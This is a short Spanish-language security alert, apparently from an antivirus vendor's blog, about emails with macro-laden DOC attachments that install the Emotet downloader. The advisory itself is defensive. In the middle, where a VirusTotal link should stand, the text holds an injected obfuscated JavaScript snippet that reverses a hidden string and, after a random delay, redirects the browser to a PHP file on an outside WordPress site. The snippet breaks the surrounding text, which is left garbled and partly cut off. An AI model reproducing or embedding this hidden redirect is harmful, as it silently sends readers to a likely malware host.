MAILS ANEXANDO FICHERO DOC CON MACROS (TIPICO DEL ACTUAL EMOTET)

Tras haber recibido hoy varios ficheros EXE con el conocido EMOTET, que pasamos a controlar a partir del ELISTARA de hoy, recibimos de varios usuarios mails anexando DOC con macros, que generan EXE´s con dicho downloader.

Ofrecemos el informe de virustotal de alguno de ellos, todos ellos de DOC con macros maliciosos que NO DEBEN EJECUTARSE Y MENOS ABRIR CON MACROS !!!

Observar que, como es típico en los EMOTET, se recibe un mail con doble remitente, el segundo de los cuales es realmente en infector, que acostumbra a ser extranjero:

Informes de virustotal:

$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}total.com/gui/file/5797ce87a47d1a36d515cb0ed640d02d658bfa199e9ca7b9e058c69365e56ccf/detection” target=”_blank” rel=”noopener noreferrer”>segundo remitente: cesar@drogariasolufarma.com.br

tos EMOTET descargan donwloader que pueden instalar variantes de TOTBRICK o variantes de ransomwares como los RYUK o quizas los nuevos de hoy, “safegman” que aun no sabemos como llegan…